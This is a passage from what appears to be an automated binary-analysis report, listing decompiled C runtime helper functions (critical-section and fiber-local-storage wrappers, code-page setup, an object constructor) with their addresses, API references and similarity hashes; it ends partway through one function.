Instruction ID: b223c87517f0c79ca8dcf2a213ac1004954eafe45bf955dcbb71594d185c7fd4
Opcode Fuzzy Hash: ecdd231ca0756dc52ceee6f722a699c96f606506331055f6f3942daf1ce012b6
Instruction Fuzzy Hash: 9501C232540209BBCF12AF909D05EEE7FA6EF18760F014518FE1466161CB72C972EB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B9C02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E001B9C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				intOrPtr* _t19;
				signed int _t21;

				_push(__ecx);
				_t8 =  *0x1cd668; // 0x44aa1787
				_v8 = _t8 ^ _t21;
				_t10 = E001B9990(0x14, "InitializeCriticalSectionEx", 0x1c607c, 0x1c6084); // executed
				_t19 = _t10;
				if(_t19 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x1c2260(_a4, _a8, _a12);
					_t11 =  *_t19();
				}
				return E001AE203(_t11, _v8 ^ _t21);
			}

0x001b9c07
0x001b9c08
0x001b9c0f
0x001b9c24
0x001b9c29
0x001b9c30
0x001b9c4d
0x001b9c32
0x001b9c3d
0x001b9c43
0x001b9c43
0x001b9c61

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,001B9291), ref: 001B9C4D

Strings

InitializeCriticalSectionEx, xrefs: 001B9C1D

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 1fb2be8d3a932e8312f0011fef0695d2d65e9f48e2f2c15f5edf25bfa0244154
Instruction ID: f628d9db45ec248d8996dc31cdf1f5e738daa5f2d622ef8ee8dc540927db3214
Opcode Fuzzy Hash: 1fb2be8d3a932e8312f0011fef0695d2d65e9f48e2f2c15f5edf25bfa0244154
Instruction Fuzzy Hash: 7FF0B431A4121CFBCB256F50DC05DAE7FA1EF18720B014019FE0416260CB718E61D780

Uniqueness

Uniqueness Score: -1.00%

Function 001B9AA7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E001B9AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				intOrPtr* _t15;
				signed int _t17;

				_push(__ecx);
				_t4 =  *0x1cd668; // 0x44aa1787
				_v8 = _t4 ^ _t17;
				_t6 = E001B9990(3, "FlsAlloc", 0x1c6040, 0x1c6048); // executed
				_t15 = _t6;
				if(_t15 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0x1c2260(_a4);
					_t7 =  *_t15();
				}
				return E001AE203(_t7, _v8 ^ _t17);
			}

0x001b9aac
0x001b9aad
0x001b9ab4
0x001b9ac9
0x001b9ace
0x001b9ad5
0x001b9ae6
0x001b9ad7
0x001b9adc
0x001b9ae2
0x001b9ae2
0x001b9afa

APIs

TlsAlloc.KERNEL32 ref: 001B9AE6

Strings

FlsAlloc, xrefs: 001B9AC2

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 4e6d620c71962cd524cf6ec3e0bd4b0aa914cf496d75faa983c2753949793df0
Instruction ID: 515d05586adefd6b8ce6967dd0be968e6c60aee7f4db1a68a77e594ed8025351
Opcode Fuzzy Hash: 4e6d620c71962cd524cf6ec3e0bd4b0aa914cf496d75faa983c2753949793df0
Instruction Fuzzy Hash: FFE02B31A45218A7C731AB619C06FBFBFA4EB65B20B01005DFD0567280CF70DE51C6C5

Uniqueness

Uniqueness Score: -1.00%

Function 001B281A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E001B281A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E001B26F9(4, "FlsAlloc", 0x1c4394, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L001AE2DD();
				return  *_t6(_a4);
			}

0x001b282f
0x001b2834
0x001b283b
0x001b284e
0x001b284e
0x001b2842
0x001b284b

APIs

try_get_function.LIBVCRUNTIME ref: 001B282F

Strings

FlsAlloc, xrefs: 001B281E, 001B2828

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: a2c168ae3e2edcc80fe71260738624d5aae245fcb06137679dfd72d36a722634
Instruction ID: 473d4338af4fe0016720bd06375c2050744312359976272fd72b4fa7f9153a28
Opcode Fuzzy Hash: a2c168ae3e2edcc80fe71260738624d5aae245fcb06137679dfd72d36a722634
Instruction Fuzzy Hash: 41D02E367893B8A3C60032C42C12FEABE889BB1BB1F050166FF0C21282C7B2880002C2

Uniqueness

Uniqueness Score: -1.00%

Function 001BA873, Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E001BA873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t76;
				signed int _t79;
				signed char* _t80;
				short* _t81;
				int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t96;
				signed int _t97;

				_t48 =  *0x1cd668; // 0x44aa1787
				_v8 = _t48 ^ _t97;
				_t96 = _a8;
				_t76 = E001BA446(__eflags, _a4);
				if(_t76 != 0) {
					_t92 = 0;
					__eflags = 0;
					_t79 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x1cd828)) - _t76;
						if( *((intOrPtr*)(_t51 + 0x1cd828)) == _t76) {
							break;
						}
						_t79 = _t79 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t79;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t76 - 0xfde8;
							if(_t76 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t76 - 0xfde9;
								if(_t76 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t76,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x1f0854 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E001BA4B9(_t96);
												goto L37;
											}
										} else {
											E001AE920(_t92, _t96 + 0x18, _t92, 0x101);
											 *(_t96 + 4) = _t76;
											 *(_t96 + 0x21c) = _t92;
											_t76 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t96 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t86 = _t71[1];
														__eflags = _t86;
														if(_t86 == 0) {
															goto L16;
														}
														_t89 = _t86 & 0x000000ff;
														_t87 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t87 - _t89;
															if(_t87 > _t89) {
																break;
															}
															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
															_t87 = _t87 + 1;
															__eflags = _t87;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t96 + 0x1a;
												_t85 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t85 = _t85 - 1;
													__eflags = _t85;
												} while (_t85 != 0);
												 *(_t96 + 0x21c) = E001BA408( *(_t96 + 4));
												 *(_t96 + 8) = _t76;
											}
											_t93 = _t96 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E001BA51E(_t76, _t89, _t93, _t96, _t96); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E001AE920(_t92, _t96 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x1cd838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t80 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t80[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t80 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0x1cd820; // 0x8040201
										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t80[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t80 =  &(_t80[2]);
								__eflags =  *_t80;
								if( *_t80 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t96 + 4) = _t76;
					 *(_t96 + 8) = 1;
					 *(_t96 + 0x21c) = E001BA408(_t76);
					_t81 = _t96 + 0xc;
					_t89 = _v36 + 0x1cd82c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t81 = _t58;
						_t81 = _t81 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E001BA4B9(_t96);
					_t60 = 0;
				}
				L39:
				return E001AE203(_t60, _v8 ^ _t97);
			}

0x001ba87b
0x001ba882
0x001ba88a
0x001ba892
0x001ba897
0x001ba8a8
0x001ba8a8
0x001ba8aa
0x001ba8ac
0x001ba8ae
0x001ba8b1
0x001ba8b1
0x001ba8b7
0x00000000
0x00000000
0x001ba8bd
0x001ba8be
0x001ba8c1
0x001ba8c4
0x001ba8c9
0x00000000
0x001ba8cb
0x001ba8cb
0x001ba8d1
0x001ba99f
0x001ba99f
0x001ba8d7
0x001ba8d7
0x001ba8dd
0x00000000
0x001ba8e3
0x001ba8e7
0x001ba8ed
0x001ba8ef
0x00000000
0x001ba8f5
0x001ba8fa
0x001ba900
0x001ba902
0x001ba98c
0x001ba992
0x00000000
0x001ba994
0x001ba995
0x00000000
0x001ba995
0x001ba908
0x001ba912
0x001ba917
0x001ba91f
0x001ba925
0x001ba926
0x001ba929
0x001ba97c
0x001ba92b
0x001ba92b
0x001ba92f
0x001ba932
0x001ba934
0x001ba934
0x001ba937
0x001ba939
0x00000000
0x00000000
0x001ba93b
0x001ba93e
0x001ba949
0x001ba949
0x001ba94b
0x00000000
0x00000000
0x001ba943
0x001ba948
0x001ba948
0x001ba948
0x001ba94d
0x001ba950
0x001ba953
0x00000000
0x00000000
0x00000000
0x001ba953
0x001ba934
0x001ba955
0x001ba955
0x001ba958
0x001ba95d
0x001ba95d
0x001ba960
0x001ba961
0x001ba961
0x001ba961
0x001ba971
0x001ba977
0x001ba977
0x001ba981
0x001ba984
0x001ba985
0x001ba986
0x001baa4a
0x001baa4b
0x001baa50
0x001baa51
0x001baa51
0x001baa51
0x001ba902
0x001ba8ef
0x001ba8dd
0x001ba8d1
0x00000000
0x001baa53
0x001ba9b1
0x001ba9b9
0x001ba9b9
0x001ba9bd
0x001ba9c0
0x001ba9c6
0x001ba9c9
0x001ba9c9
0x001ba9cc
0x001ba9ce
0x001ba9d0
0x001ba9d0
0x001ba9d3
0x001ba9d5
0x00000000
0x00000000
0x001ba9d7
0x001ba9da
0x001ba9f6
0x001ba9f6
0x001ba9f8
0x00000000
0x00000000
0x001ba9df
0x001ba9e5
0x001ba9e7
0x001ba9ed
0x001ba9f1
0x001ba9f1
0x001ba9f2
0x00000000
0x001ba9f2
0x00000000
0x001ba9e5
0x001ba9fa
0x001ba9fd
0x001baa00
0x00000000
0x00000000
0x00000000
0x001baa00
0x001baa02
0x001baa02
0x001baa05
0x001baa06
0x001baa09
0x001baa0c
0x001baa0c
0x001baa12
0x001baa15
0x001baa24
0x001baa2d
0x001baa32
0x001baa38
0x001baa39
0x001baa39
0x001baa3c
0x001baa3f
0x001baa42
0x001baa45
0x001baa45
0x001baa45
0x00000000
0x001ba899
0x001ba89a
0x001ba8a0
0x001ba8a0
0x001baa54
0x001baa63

APIs

Part of subcall function 001BA446: GetOEMCP.KERNEL32(00000000,?,?,001BA6CF,?), ref: 001BA471

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,001BA714,?,00000000), ref: 001BA8E7
GetCPInfo.KERNEL32(00000000,001BA714,?,?,?,001BA714,?,00000000), ref: 001BA8FA

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: f469793bdad28eaffd7b598f228ac3eaf4cc7d9e8bea72082f1b261c650a99d4
Instruction ID: ee047b8ed97b6087d4c2197133d03ef6117c554eb8c74b9baa9b361c729a3d91
Opcode Fuzzy Hash: f469793bdad28eaffd7b598f228ac3eaf4cc7d9e8bea72082f1b261c650a99d4
Instruction Fuzzy Hash: E3518570A003059FDB24CF31C891AFBFBE5EF01314F99802ED0968B242E7399946DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00191382, Relevance: 3.1, APIs: 2, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00191382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E001AD870(_t56, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E0019943C(_t78);
				 *_t89 = 0x1c22e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00195E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0019C4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0019151B();
				_t62 = E0019151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E001AD82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0019AD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E001AE920(_t87, _t89 + 0x2208, 0, 0x40);
				E001AE920(_t87, _t89 + 0x2248, 0, 0x34);
				E001AE920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00191382
0x00191382
0x00191382
0x00191382
0x00191382
0x00191387
0x0019138a
0x0019138c
0x0019138f
0x00191396
0x001913a2
0x001913a5
0x001913b0
0x001913b4
0x001913bf
0x001913c5
0x001913cb
0x001913d6
0x001913de
0x001913e2
0x001913e5
0x001913eb
0x001913f1
0x001913f3
0x00191418
0x001913f5
0x001913fa
0x00191400
0x00191403
0x00191409
0x00191414
0x0019140b
0x0019140d
0x0019140d
0x00191409
0x0019141b
0x00191427
0x0019142e
0x00191435
0x0019143e
0x00191449
0x00191453
0x00191459
0x0019145f
0x00191465
0x0019146b
0x00191471
0x00191477
0x0019147e
0x00191484
0x0019148a
0x00191490
0x00191496
0x0019149c
0x001914ab
0x001914ba
0x001914c5
0x001914cd
0x001914d3
0x001914d9
0x001914df
0x001914e5
0x001914eb
0x001914f1
0x001914fa
0x00191500
0x00191506
0x0019150e
0x00191518

APIs

__EH_prolog.LIBCMT ref: 00191382

Part of subcall function 00195E99: __EH_prolog.LIBCMT ref: 00195E9E

Part of subcall function 0019C4CA: __EH_prolog.LIBCMT ref: 0019C4CF
Part of subcall function 0019C4CA: new.LIBCMT ref: 0019C512
Part of subcall function 0019C4CA: new.LIBCMT ref: 0019C536

new.LIBCMT ref: 001913FA

Part of subcall function 0019AD1B: __EH_prolog.LIBCMT ref: 0019AD20

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 30cf798fb6a3205db3d0a814945f205ba8b9ad96e6b4af081f5a260dc9a894b8
Instruction ID: 4c5509c3a5128d6973943b29738408e6ac187929b30f5da500edb745277442a8
Opcode Fuzzy Hash: 30cf798fb6a3205db3d0a814945f205ba8b9ad96e6b4af081f5a260dc9a894b8
Instruction Fuzzy Hash: EA4123B0905B409EEB24CF798485AE6FBE5FF29300F504A2ED5EE83282CB326554CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0019137D, Relevance: 3.1, APIs: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0019137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E001AD870(E001C1157, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E0019943C(_t78);
				 *_t89 = 0x1c22e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00195E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0019C4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0019151B();
				_t62 = E0019151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E001AD82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0019AD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E001AE920(_t87, _t89 + 0x2208, 0, 0x40);
				E001AE920(_t87, _t89 + 0x2248, 0, 0x34);
				E001AE920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x0019137d
0x0019137d
0x0019137d
0x0019137d
0x00191382
0x00191387
0x0019138a
0x0019138c
0x0019138f
0x00191396
0x001913a2
0x001913a5
0x001913b0
0x001913b4
0x001913bf
0x001913c5
0x001913cb
0x001913d6
0x001913de
0x001913e2
0x001913e5
0x001913eb
0x001913f1
0x001913f3
0x00191418
0x001913f5
0x001913fa
0x00191400
0x00191403
0x00191409
0x00191414
0x0019140b
0x0019140d
0x0019140d
0x00191409
0x0019141b
0x00191427
0x0019142e
0x00191435
0x0019143e
0x00191449
0x00191453
0x00191459
0x0019145f
0x00191465
0x0019146b
0x00191471
0x00191477
0x0019147e
0x00191484
0x0019148a
0x00191490
0x00191496
0x0019149c
0x001914ab
0x001914ba
0x001914c5
0x001914cd
0x001914d3
0x001914d9
0x001914df
0x001914e5
0x001914eb
0x001914f1
0x001914fa
0x00191500
0x00191506
0x0019150e
0x00191518

APIs

__EH_prolog.LIBCMT ref: 00191382

Part of subcall function 00195E99: __EH_prolog.LIBCMT ref: 00195E9E

Part of subcall function 0019C4CA: __EH_prolog.LIBCMT ref: 0019C4CF
Part of subcall function 0019C4CA: new.LIBCMT ref: 0019C512
Part of subcall function 0019C4CA: new.LIBCMT ref: 0019C536

new.LIBCMT ref: 001913FA

Part of subcall function 0019AD1B: __EH_prolog.LIBCMT ref: 0019AD20

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4e754e16d0a942659417ddbf70b05aa291bed14db7c107f322e5d50f9e3a93a3
Instruction ID: b08d9e839c73f1127456f795f05438b5c21692ebfda01e1180e08a297deec75e
Opcode Fuzzy Hash: 4e754e16d0a942659417ddbf70b05aa291bed14db7c107f322e5d50f9e3a93a3
Instruction Fuzzy Hash: DC4135B0905B409EEB24DF798485AE7FBE5FF29300F504A2ED5EE83282CB326554CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001BA6B2, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E001BA6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E001B8516(__ebx, __ecx, __edx);
				E001BA7D1(__ebx, __ecx, __edx, _t81);
				_t31 = E001BA446(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
